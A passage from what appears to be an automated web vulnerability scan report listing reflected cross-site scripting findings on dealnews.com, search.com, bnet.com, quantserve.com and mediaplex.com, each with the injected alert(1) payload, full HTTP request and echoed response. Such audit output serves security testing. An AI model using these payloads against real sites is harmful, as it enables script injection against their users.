Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/xml;charset=UTF-8
Date: Wed, 27 Apr 2011 23:16:41 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 1696

<response><widgets><widget><token>24a959472d426540cf6e325aebfb47c99af45bcf0000012f988ee669</token><app-id>54b05723-2d57-4335-b0fe-2a325ee46eceb7e79<a>022e5f546dc</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

3.472. http://dealnews.com/lw/log_syndication.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dealnews.com
Path:	/lw/log_syndication.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7a15b<script>alert(1)</script>fedaf6de5bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lw7a15b<script>alert(1)</script>fedaf6de5bd/log_syndication.php?refcode=cnet-widget&cb=1303941159.64 HTTP/1.1
Host: dealnews.com
Proxy-Connection: keep-alive
Referer: http://dealnews.com/synd/2.1/widget.php?iframe=1&format=sidebar&site_id=2&cats=171&refcode=cnet-widget&height=261&width=400&textsize=11px&color=%237b7b7b&bgcolor=%23ffffff&titlesize=11px&linkcolor=%23003b6b&titleweight=bold&linkdeco=none&altcolor=inherit&seperatorcolor=transparent&hide_snippet=0&direct_links=1&new_window=1&url_prepend=http%3A%2F%2Fdw.com.com%2Fredir%3Fastid%3D2%26ltype%3Dmlst%26merId%3D10000005%26mfgId%3D10000005%26oid%3D2001-6500_7-33387147%26ontid%3D6500%26pg%3D%26pId%3D33387147%26prc%3D%2524%26sorder%3D%26stype%3D%26tag%3Ddndeals%26ttag%3Ddnwidget%26lop%3Donline%26edId%3D3%26siteid%3D7%26channelid%3D33%26destUrl%3D&cb=1303941383231
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 27 Apr 2011 22:03:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-pl0-gentoo
Status: 404 Not Found
Set-Cookie: LOLSESS=804ttucgu58jr3lgq9fqfb1rasblub5c; expires=Wed, 25-May-2011 22:03:41 GMT; path=/; domain=.dealnews.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1081

<html><head><title>File Not Found</title>
<style>
body, td {
font-family: Arial;
font-size: 10pt;
}
a:link {
color: #30309A;
}
a:visited {
color: #1f2e62;
}
</style></head><body><div align="center" st
...[SNIP]...
<p>The page you've requested, "http://dealnews.com/lw7a15b<script>alert(1)</script>fedaf6de5bd/log_syndication.php", no longer exists or has moved to a new location.
If you're unable to find what you were looking for, please contact the
<a href="/contact.html">
...[SNIP]...

3.473. http://dealnews.com/synd/2.1/widget.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dealnews.com
Path:	/synd/2.1/widget.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cfb6d<script>alert(1)</script>e2f18a2af26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /syndcfb6d<script>alert(1)</script>e2f18a2af26/2.1/widget.php?iframe=1&format=sidebar&site_id=2&cats=171&refcode=cnet-widget&height=261&width=400&textsize=11px&color=%237b7b7b&bgcolor=%23ffffff&titlesize=11px&linkcolor=%23003b6b&titleweight=bold&linkdeco=none&altcolor=inherit&seperatorcolor=transparent&hide_snippet=0&direct_links=1&new_window=1&url_prepend=http%3A%2F%2Fdw.com.com%2Fredir%3Fastid%3D2%26ltype%3Dmlst%26merId%3D10000005%26mfgId%3D10000005%26oid%3D2001-6500_7-33387147%26ontid%3D6500%26pg%3D%26pId%3D33387147%26prc%3D%2524%26sorder%3D%26stype%3D%26tag%3Ddndeals%26ttag%3Ddnwidget%26lop%3Donline%26edId%3D3%26siteid%3D7%26channelid%3D33%26destUrl%3D&cb=1303941383231 HTTP/1.1
Host: dealnews.com
Proxy-Connection: keep-alive
Referer: http://reviews.cnet.com/cell-phones/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 27 Apr 2011 22:12:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-pl0-gentoo
Status: 404 Not Found
Set-Cookie: LOLSESS=mehqtufef3u5tbrhpi5tpu4l4p321lbb; expires=Wed, 25-May-2011 22:12:54 GMT; path=/; domain=.dealnews.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1078

<html><head><title>File Not Found</title>
<style>
body, td {
font-family: Arial;
font-size: 10pt;
}
a:link {
color: #30309A;
}
a:visited {
color: #1f2e62;
}
</style></head><body><div align="center" st
...[SNIP]...
<p>The page you've requested, "http://dealnews.com/syndcfb6d<script>alert(1)</script>e2f18a2af26/2.1/widget.php", no longer exists or has moved to a new location.
If you're unable to find what you were looking for, please contact the
<a href="/contact.html">
...[SNIP]...

3.474. http://dealnews.com/synd/2.1/widget.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dealnews.com
Path:	/synd/2.1/widget.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 804a6<script>alert(1)</script>68660b748a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /synd/2.1804a6<script>alert(1)</script>68660b748a0/widget.php?iframe=1&format=sidebar&site_id=2&cats=171&refcode=cnet-widget&height=261&width=400&textsize=11px&color=%237b7b7b&bgcolor=%23ffffff&titlesize=11px&linkcolor=%23003b6b&titleweight=bold&linkdeco=none&altcolor=inherit&seperatorcolor=transparent&hide_snippet=0&direct_links=1&new_window=1&url_prepend=http%3A%2F%2Fdw.com.com%2Fredir%3Fastid%3D2%26ltype%3Dmlst%26merId%3D10000005%26mfgId%3D10000005%26oid%3D2001-6500_7-33387147%26ontid%3D6500%26pg%3D%26pId%3D33387147%26prc%3D%2524%26sorder%3D%26stype%3D%26tag%3Ddndeals%26ttag%3Ddnwidget%26lop%3Donline%26edId%3D3%26siteid%3D7%26channelid%3D33%26destUrl%3D&cb=1303941383231 HTTP/1.1
Host: dealnews.com
Proxy-Connection: keep-alive
Referer: http://reviews.cnet.com/cell-phones/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 27 Apr 2011 22:13:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-pl0-gentoo
Status: 404 Not Found
Set-Cookie: LOLSESS=20psat8ce686r2pkeffnsmpc2sqr2gek; expires=Wed, 25-May-2011 22:13:05 GMT; path=/; domain=.dealnews.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1681

<html><head><title>File Not Found</title>
<style>
body, td {
font-family: Arial;
font-size: 10pt;
}
a:link {
color: #30309A;
}
a:visited {
color: #1f2e62;
}
</style></head><body><div align="center" st
...[SNIP]...
<p>The page you've requested, "http://dealnews.com/synd/2.1804a6<script>alert(1)</script>68660b748a0/widget.php?altcolor=inherit&bgcolor=%23ffffff&cats=171&color=%237b7b7b&direct_links=1&format=sidebar&height=261&hide_snippet=0&iframe=1&linkcolor=%23003b6b&linkdeco=none&new_window=1&refcode=cnet-widg
...[SNIP]...

3.475. http://dealnews.com/synd/2.1/widget.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dealnews.com
Path:	/synd/2.1/widget.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 54435<script>alert(1)</script>8eb81a9325a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /synd/2.1/widget.php54435<script>alert(1)</script>8eb81a9325a?iframe=1&format=sidebar&site_id=2&cats=171&refcode=cnet-widget&height=261&width=400&textsize=11px&color=%237b7b7b&bgcolor=%23ffffff&titlesize=11px&linkcolor=%23003b6b&titleweight=bold&linkdeco=none&altcolor=inherit&seperatorcolor=transparent&hide_snippet=0&direct_links=1&new_window=1&url_prepend=http%3A%2F%2Fdw.com.com%2Fredir%3Fastid%3D2%26ltype%3Dmlst%26merId%3D10000005%26mfgId%3D10000005%26oid%3D2001-6500_7-33387147%26ontid%3D6500%26pg%3D%26pId%3D33387147%26prc%3D%2524%26sorder%3D%26stype%3D%26tag%3Ddndeals%26ttag%3Ddnwidget%26lop%3Donline%26edId%3D3%26siteid%3D7%26channelid%3D33%26destUrl%3D&cb=1303941383231 HTTP/1.1
Host: dealnews.com
Proxy-Connection: keep-alive
Referer: http://reviews.cnet.com/cell-phones/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 27 Apr 2011 22:13:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-pl0-gentoo
Status: 404 Not Found
Set-Cookie: LOLSESS=kkngd542auo6ffphm8uqhet40r0qrfgm; expires=Wed, 25-May-2011 22:13:16 GMT; path=/; domain=.dealnews.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1681

<html><head><title>File Not Found</title>
<style>
body, td {
font-family: Arial;
font-size: 10pt;
}
a:link {
color: #30309A;
}
a:visited {
color: #1f2e62;
}
</style></head><body><div align="center" st
...[SNIP]...
<p>The page you've requested, "http://dealnews.com/synd/2.1/widget.php54435<script>alert(1)</script>8eb81a9325a?altcolor=inherit&bgcolor=%23ffffff&cats=171&color=%237b7b7b&direct_links=1&format=sidebar&height=261&hide_snippet=0&iframe=1&linkcolor=%23003b6b&linkdeco=none&new_window=1&refcode=cnet-widget&seperato
...[SNIP]...

3.476. http://domainhelp.search.com/search [d parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://domainhelp.search.com
Path:	/search

Issue detail

The value of the d request parameter is copied into the HTML document as plain text between tags. The payload 7d8f3<script>alert(1)</script>e72f82db0fd was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=ui-layouts&d=ui-layouts.com.com7d8f3<script>alert(1)</script>e72f82db0fd HTTP/1.1
Host: domainhelp.search.com
Proxy-Connection: keep-alive
Referer: http://ui-layouts.com.com/tsi/?sid=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:27:58 GMT
Server: Apache
Expires: Wed Apr 27 21:32:58 2011 GMT
Cache-Control: private, max-age=300, must-revalidate
P3P: CP="NON DSP COR DEVa PSAa PSDa OUR IND UNI COM", policyref="http://www.cnet.com/w3c/p3p.xml"
Content-Type: text/html; charset=utf-8
Content-Length: 28013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html><head>
<title>ui-layouts.com.com7d8f3<script>alert(1)</s
...[SNIP]...
<b>ui-layouts.com.com7d8f3<script>alert(1)</script>e72f82db0fd</b>
...[SNIP]...

3.477. http://domainhelp.search.com/search [d parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://domainhelp.search.com
Path:	/search

Issue detail

The value of the d request parameter is copied into the HTML document as text between TITLE tags. The payload d7ad5</title><script>alert(1)</script>0e02d76dc65 was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=ui-layouts&d=ui-layouts.com.comd7ad5</title><script>alert(1)</script>0e02d76dc65 HTTP/1.1
Host: domainhelp.search.com
Proxy-Connection: keep-alive
Referer: http://ui-layouts.com.com/tsi/?sid=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:28:00 GMT
Server: Apache
Expires: Wed Apr 27 21:33:00 2011 GMT
Cache-Control: private, max-age=300, must-revalidate
P3P: CP="NON DSP COR DEVa PSAa PSDa OUR IND UNI COM", policyref="http://www.cnet.com/w3c/p3p.xml"
Content-Type: text/html; charset=utf-8
Content-Length: 28069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html><head>
<title>ui-layouts.com.comd7ad5</title><script>alert(1)</script>0e02d76dc65 - Search.com</title>
...[SNIP]...

3.478. http://domainhelp.search.com/search [d parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://domainhelp.search.com
Path:	/search

Issue detail

The value of the d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba37"><script>alert(1)</script>16ba8535ae2 was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=ui-layouts&d=ui-layouts.com.comcba37"><script>alert(1)</script>16ba8535ae2 HTTP/1.1
Host: domainhelp.search.com
Proxy-Connection: keep-alive
Referer: http://ui-layouts.com.com/tsi/?sid=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:27:56 GMT
Server: Apache
Expires: Wed Apr 27 21:32:56 2011 GMT
Cache-Control: private, max-age=300, must-revalidate
P3P: CP="NON DSP COR DEVa PSAa PSDa OUR IND UNI COM", policyref="http://www.cnet.com/w3c/p3p.xml"
Content-Type: text/html; charset=utf-8
Content-Length: 28050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html><head>
<title>ui-layouts.com.comcba37"><script>alert(1)<
...[SNIP]...
<meta name="keywords" content="ui-layouts.com.comcba37"><script>alert(1)</script>16ba8535ae2" />
...[SNIP]...

3.479. http://domainhelp.search.com/search [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://domainhelp.search.com
Path:	/search

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fba83"-alert(1)-"6c62ceffb06 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search?q=ui-layoutsfba83"-alert(1)-"6c62ceffb06&d=ui-layouts.com.com HTTP/1.1
Host: domainhelp.search.com
Proxy-Connection: keep-alive
Referer: http://ui-layouts.com.com/tsi/?sid=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:27:44 GMT
Server: Apache
Expires: Wed Apr 27 21:32:44 2011 GMT
Cache-Control: private, max-age=300, must-revalidate
P3P: CP="NON DSP COR DEVa PSAa PSDa OUR IND UNI COM", policyref="http://www.cnet.com/w3c/p3p.xml"
Content-Type: text/html; charset=utf-8
Content-Length: 51607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html><head>
<title>ui-layouts.com.com - Search.com</title>
<m
...[SNIP]...
%2E16%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F10%2E0%2E648%2E205%20Safari%2F534%2E16&channel=com-search&hl=en&adsafe=high&oe=utf8&ad=w10&ie=utf8&output=xml_no_dtd&client=cnet-com-search&q=ui-layoutsfba83"-alert(1)-"6c62ceffb06&start=0","parseTime":"0.0015","cacheTTL":"23","clientId":"cnet-com-search","channelId":"com-search"}]}</script>
...[SNIP]...

3.480. http://finance.bnet.com/bnet [Module parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://finance.bnet.com
Path:	/bnet

Issue detail

The value of the Module request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae405'-alert(1)-'9ec96e0bc1e was submitted in the Module parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bnet?Module=tickerbarcbsae405'-alert(1)-'9ec96e0bc1e&Output=JS HTTP/1.1
Host: finance.bnet.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:08 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Wed, 27 Apr 2011 23:17:08 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 771

var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.bnet.com%2Fbnet%3FHTTP_HOST%3Dfinance.bnet.com%26HTTPS%3Doff%26Module%3Dtickerbarcbsae405'-alert(1)-'9ec96e0bc1e%26Output%3DJS&Type=widget&Client=bnet&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=docume
...[SNIP]...

3.481. http://finance.bnet.com/bnet [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://finance.bnet.com
Path:	/bnet

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba45c'-alert(1)-'ce3ddf9dc68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bnetba45c'-alert(1)-'ce3ddf9dc68?Module=tickerbarcbs&Output=JS HTTP/1.1
Host: finance.bnet.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:09 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Wed, 27 Apr 2011 23:17:09 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 799

var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.bnet.com%2Fbnetba45c'-alert(1)-'ce3ddf9dc68%3FHTTP_HOST%3Dfinance.bnet.com%26HTTPS%3Doff%26Module%3Dtickerbarcbs%26Output%3DJS&Type=widget&Client=bnetba45c'-alert(1)-'ce3ddf9dc68&rand=' + Math.random();
head.appendChild(script);

_qoptions={
...[SNIP]...

3.482. http://finance.bnet.com/bnet [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://finance.bnet.com
Path:	/bnet

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b97a4'-alert(1)-'5c8530e4f04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bnet?Module=tickerbarcbs&Output=JS&b97a4'-alert(1)-'5c8530e4f04=1 HTTP/1.1
Host: finance.bnet.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:09 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Wed, 27 Apr 2011 23:17:08 GMT
Expires: Wed, 27 Apr 2011 23:18:09 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 2737

document.write('<div class="fcmoneywatch tickerbarcbs">\n');
document.write('<div class="tickerBar">\n');
document.write('<strong>Markets:<\/strong>\n');
document.write('<ul>\n');
document.write('\n')
...[SNIP]...
javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.bnet.com%2Fbnet%3FHTTP_HOST%3Dfinance.bnet.com%26HTTPS%3Doff%26Module%3Dtickerbarcbs%26Output%3DJS%26b97a4'-alert(1)-'5c8530e4f04%3D1&Type=widget&Client=bnet&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=document.createE
...[SNIP]...

3.483. http://flash.quantserve.com/quant.swf [lc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://flash.quantserve.com
Path:	/quant.swf

Issue detail

The value of the lc request parameter is copied into the HTML document as plain text between tags. The payload 2f420<script>alert(1)</script>f959d9899b7 was submitted in the lc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /quant.swf?videoId=233620153&flashPlayer=WIN%2010%2C2%2C154%2C27&url=http%3A%2F%2Fwww%2Dcontent%2Dv3%2Emaxpreps%2Ecom%2Eedgesuite%2Enet%2Fincludes%2Fflash%2Funiversalvideoplayer%2Fbin%2Fvideoplayer%2E20110412%2Eswf&qcv=2%2E1%2E1&media=ad&lc=%5F1303947476174%5F9462f420<script>alert(1)</script>f959d9899b7&server=http%3A%2F%2Fflash%2Equantserve%2Ecom&path=null%2EDefault%5F3%2E%2E%2E233620153%2CDefault%5F3%2E%2E%2E233620153%2C%2E%2E233620153%2Cnull%2E%2E%2E233620153&pageURL=http%3A%2F%2Fwww%2Emaxpreps%2Ecom%2Fnational%2Fnational%2Ehtm&fpf=&publisherId=p%2D4fIJOpeW%2DyPHI&title=Default%5F3 HTTP/1.1
Host: flash.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www-content-v3.maxpreps.com.edgesuite.net/includes/flash/universalvideoplayer/bin/videoplayer.20110412.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EJ4AD-8kjVmtjIMAAY8BAc4GgfEAmtGCvIGx_BobgwmkGpYgGjTBH-EQQBwSAAADBAGKkRx0MQIRsSASIBoSijAAlRQjCCAwQY5RAOiSABAshEiysaQw

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-shockwave-flash
Cache-Control: private, no-transform, max-age=86400
Expires: Thu, 28 Apr 2011 23:41:28 GMT
Date: Wed, 27 Apr 2011 23:41:28 GMT
Server: QS
Content-Length: 4715

FWS.k...x.._.........D.....C....?.A....i.n.setTrace.dothetrace.allowTrace.read_so._depth.setUpLocal_lc.remote_lc.LocalConnection.LOCAL_LCNAME.rpcResult.REMOTE_LCNAME.send.local_lc.allowDomain.allowIns
...[SNIP]...
bject not saved..quant Shared object flushed to disk..quant Shared object could not be flushed to disk..write_so.idToSecs.-.indexOf.slice.parseInt.Math.floor.Date.getTime..join.1-0-0._1303947476174_9462f420<script>alert(1)</script>f959d9899b7.nothetrace.3.0.0.this.logs.initialize....initialize....)..............I............................=.. ..........O..............=................@................... .
.................R....setUpLoc
...[SNIP]...

3.484. http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9aede"-alert(1)-"ae9c8a7b785 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-125186-27904-1%3Fmpt%3D2011.04.27.21.56.019aede"-alert(1)-"ae9c8a7b785&mpt=2011.04.27.21.56.01&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://reviews.cnet.com/cell-phones/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
